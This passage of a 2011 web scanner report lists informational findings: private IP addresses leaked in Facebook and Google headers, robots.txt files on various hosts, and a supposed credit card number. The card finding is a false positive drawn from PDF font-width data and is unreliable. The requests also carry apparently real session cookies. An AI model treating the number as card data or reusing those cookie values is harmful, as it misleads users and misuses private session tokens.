Set-Cookie: wcc_341_2256_=""; Expires=Fri, 11-May-2012 01:10:39 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 11812

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<a href="mailto:webmaster@westcongroup.com?subject=Request for Information For Webmaster on the Westcon Group Corporate Website" class="footerNav">
...[SNIP]...

22. Private IP addresses disclosed previous next
There are 11 instances of this issue:

http://api.facebook.com/restserver.php
http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css
http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML
http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.google.com/sdch/vD843DpA.dct

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

22.1. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.55.37

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Wed, 11 May 2011 17:50:11 -0700
Pragma:
X-FB-Rev: 377111
X-FB-Server: 10.42.55.37
X-Cnection: close
Date: Thu, 12 May 2011 00:48:11 GMT
Content-Length: 437

fb_sharepro_render([{"url":"http:\/\/connectedplanetonline.com\/bss_oss\/news\/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422\/","normalized_url":"http:\/\/www.connectedpl
...[SNIP]...

22.2. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.facebook.com
Path:	/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.180.65

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
ETag: "4cee9fd4a0927297616c6d703f3dd063"
Vary: Accept-Encoding
X-FB-Server: 10.54.180.65
X-Cnection: close
Content-Type: text/css; charset=utf-8
Cache-Control: public, max-age=828
Expires: Thu, 12 May 2011 00:17:41 GMT
Date: Thu, 12 May 2011 00:03:53 GMT
Connection: close
Content-Length: 14288

/*1303254984,169912451,JIT Construction: v368160,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...

22.3. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.facebook.com
Path:	/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.26.69

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
ETag: "58e1496b32464fbedd2093e9be3b729d"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.53.26.69
X-Cnection: close
Cache-Control: public, max-age=732
Expires: Thu, 12 May 2011 00:16:04 GMT
Date: Thu, 12 May 2011 00:03:52 GMT
Connection: close
Content-Length: 211441

/*1305151955,171252293,JIT Construction: v377111,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.4. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.facebook.com
Path:	/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.10.45

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
ETag: "f7c3a8625578e602429bdf1c550775f8"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.53.10.45
X-Cnection: close
Cache-Control: public, max-age=800
Expires: Thu, 12 May 2011 00:17:11 GMT
Date: Thu, 12 May 2011 00:03:51 GMT
Connection: close
Content-Length: 18445

/*1305152831,171248173,JIT Construction: v377111,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.5. http://static.ak.fbcdn.net/connect.php/js/FB.Share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.178.121

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "0c6759cf25c5d2a0efcbf784e59da83f"

Response

HTTP/1.1 200 OK
ETag: "c52ea28f19b96d3d867f6d652597618e"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.32.178.121
X-Cnection: close
Cache-Control: public, max-age=970
Expires: Thu, 12 May 2011 01:03:02 GMT
Date: Thu, 12 May 2011 00:46:52 GMT
Connection: close
Content-Length: 6584

/*1305152020,169915001,JIT Construction: v377111,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.6. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yS/r/vnjkQm4QANt.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/yS/r/vnjkQm4QANt.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 10 May 2011 05:43:32 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31502232
Expires: Thu, 10 May 2012 15:23:15 GMT
Date: Thu, 12 May 2011 00:46:03 GMT
Connection: close
Content-Length: 68202

/*1305127406,169776317*/

if (window.CavalryLogger) { CavalryLogger.start_js(["JYXUq"]); }

!function(){function a(b){return function(){if(this===window)throw new TypeError();return b.apply(this,argum
...[SNIP]...

22.7. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yh/r/HD3OAbjOVTn.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.182

Request

GET /rsrc.php/v1/yh/r/HD3OAbjOVTn.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:26 GMT
X-FB-Server: 10.138.64.182
Vary: Accept-Encoding
Cache-Control: public, max-age=31523022
Expires: Thu, 10 May 2012 21:09:45 GMT
Date: Thu, 12 May 2011 00:46:03 GMT
Connection: close
Content-Length: 32405

/*1305148157,176832694*/

.DOMControl_placeholder{color:#777}
.no_js .DOMControl_placeholder{color:#000}
.DOMControl_shadow{left:-10000px;position:absolute;top:-10000px;white-space:pre-wrap}
body{back
...[SNIP]...

22.8. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.176.37

Request

GET /extern/login_status.php?api_key=cdfc157005060ae489940a41d8b546cc&extern=0&channel=http%3A%2F%2Fnanpa.org%2F%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.176.37
X-Cnection: close
Date: Thu, 12 May 2011 00:03:54 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

22.9. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.149.31

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.31
X-Cnection: close
Date: Thu, 12 May 2011 00:05:11 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

22.10. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.18.37

Request

Response

22.11. http://www.google.com/sdch/vD843DpA.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=THnvL1Oo2rFB1EyPuENlypklsUgiuRDrggMizX7GcvuSEWk1O1BRhP0HMsig4_tUMgrpgSA4JfKinmjR9Q08mpbqo9YLMeQa1bwUSS3rWNSNQKH_51QqwF1Bj_TupkUW
If-Modified-Since: Wed, 11 May 2011 19:03:16 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Thu, 12 May 2011 00:18:06 GMT
Date: Thu, 12 May 2011 00:43:58 GMT
Expires: Thu, 12 May 2011 00:43:58 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&q=related: http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &rct=j&sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=www.google
...[SNIP]...
<a href="/search?hl=en&q=related:http://172.31.196.197:8888/search?q=cache: &cd= &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...

23. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech-is.com
Path:	/linkclick.aspx

Issue detail

The following credit card number was disclosed in the response:

5965280585586274

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /linkclick.aspx?fileticket=Q2hLSu2t%2bYo%3d&tabid=227 HTTP/1.1
Host: www.hickorytech-is.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=kn1HQ8lGzAEkAAAANTUxOTkwMDUtMTlhZC00NjBiLTlhZWUtOTc5OTU2NzkzNDgx0; sifrFetch=true; __utmz=18594464.1305158372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); language=en-US; __utma=18594464.1340748012.1305158372.1305158372.1305158372.1; __utmc=18594464; __utmb=18594464.3.10.1305158372

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
content-disposition: inline; filename="CABS Overview 9-2010.pdf"
Content-Length: 267955
Cache-Control: private
Content-Type: application/pdf

%PDF-1.4%....
17 0 obj <</Linearized 1/L 267955/O 19/E 113339/N 2/T 267568/H [ 1136 281]>>endobj
xref
17 42
0000000016 00000 n
0000001417 00000 n
0000001497 00000 n
0000001719
...[SNIP]...
har 174/Widths[202 0 0 0 0 0 0 0 0 0 0 0 0 322 260 0 555 555 555 0 0 0 0 0 0 0 260 0 0 0 0 0 0 656 604 595 696 0 0 682 689 285 0 0 0 0 0 717 581 0 593 540 548 0 636 888 0 603 0 0 0 0 0 0 0 528 598 451 596 528 0 585 586 274 291 542 275 860 586 577 598 0 380 434 367 583 530 759 0 523 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 202 0 0 0 0 0 0 0 0 677 0 0 0 322 459]/BaseFont/OOKEAO+MyriadPro
...[SNIP]...

24. Robots.txt file previous next
There are 42 instances of this issue:

http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget
http://altfarm.mediaplex.com/ad/js/12688-127209-4062-0
http://api.facebook.com/restserver.php
http://b.scorecardresearch.com/b
http://by.optimost.com/trial/471/p/landingpage.6cf/40/content.js
http://cdn.stumble-upon.com/css/badges_su.css
http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
http://feeds.bbci.co.uk/news/rss.xml
http://fls.doubleclick.net/activityi
http://googleads.g.doubleclick.net/pagead/ads
http://i.dslr.net/css/aj6m.js
http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js
http://investor.hickorytech.com/phoenix.zhtml
http://l.addthiscdn.com/live/t00/250lo.gif
http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612
http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294
http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139
http://nanpa.org/
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://nextelonline.nextel.com/tl/set_tl.html
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://pixel.quantserve.com/pixel
http://s.clickability.com/s
http://shop2.sprint.com/en/support/faq/wlnp.shtml
http://tis.org/
http://twitter.com/statuses/user_timeline/secviz.json
http://www.911enable.com/
http://www.atis.org/
http://www.awltovhc.com/image-1791927-2832191
http://www.catalysttelecom.com/
http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-
http://www.facebook.com/extern/login_status.php
http://www.google-analytics.com/__utm.gif
http://www.job-search-engine.com/keyword/number-portability/
http://www.linkedin.com/companyInsider
http://www.nanpa.org/forums/external.php
http://www.resourcenter.com/
http://www.secviz.org/node/89
http://www.stumbleupon.com/hostedbadge.php
http://www.vonage-forum.com/forum8.html
http://www.vonage.com/lp/US/afflpdc/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

24.1. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/connectedplanet.iclick.com/adtarget

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 12 May 2011 00:47:35 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

24.2. http://altfarm.mediaplex.com/ad/js/12688-127209-4062-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/12688-127209-4062-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Thu, 12 May 2011 00:47:55 GMT
Connection: keep-alive

User-agent: *
Disallow: /

24.3. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Sat, 11 Jun 2011 00:48:13 GMT
X-FB-Server: 10.42.69.41
Connection: close
Content-Length: 24

User-agent: *
Disallow:

24.4. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 13 May 2011 01:07:20 GMT
Date: Thu, 12 May 2011 01:07:20 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

24.5. http://by.optimost.com/trial/471/p/landingpage.6cf/40/content.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://by.optimost.com
Path:	/trial/471/p/landingpage.6cf/40/content.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/plain
Content-Length: 26
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 00:50:36 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 00:50:36 GMT
Connection: close

User-agent: *
Disallow: /

24.6. http://cdn.stumble-upon.com/css/badges_su.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.stumble-upon.com
Path:	/css/badges_su.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 27 Jan 2011 22:52:53 GMT
Content-Type: text/plain; charset=iso-8859-1
Date: Thu, 12 May 2011 00:48:22 GMT
Content-Length: 1962
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

24.7. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connectedplanetonline.com
Path:	/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: connectedplanetonline.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/plain

# robots.txt for Sites
# Do Not delete this file.
# Last Updated: Dec 31, 2009 (Alex Morse)

# keep robots out of the executable tree
User-agent: *
Disallow: /no-index/
Disallow: /404/
Disallow: /test
...[SNIP]...

24.8. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
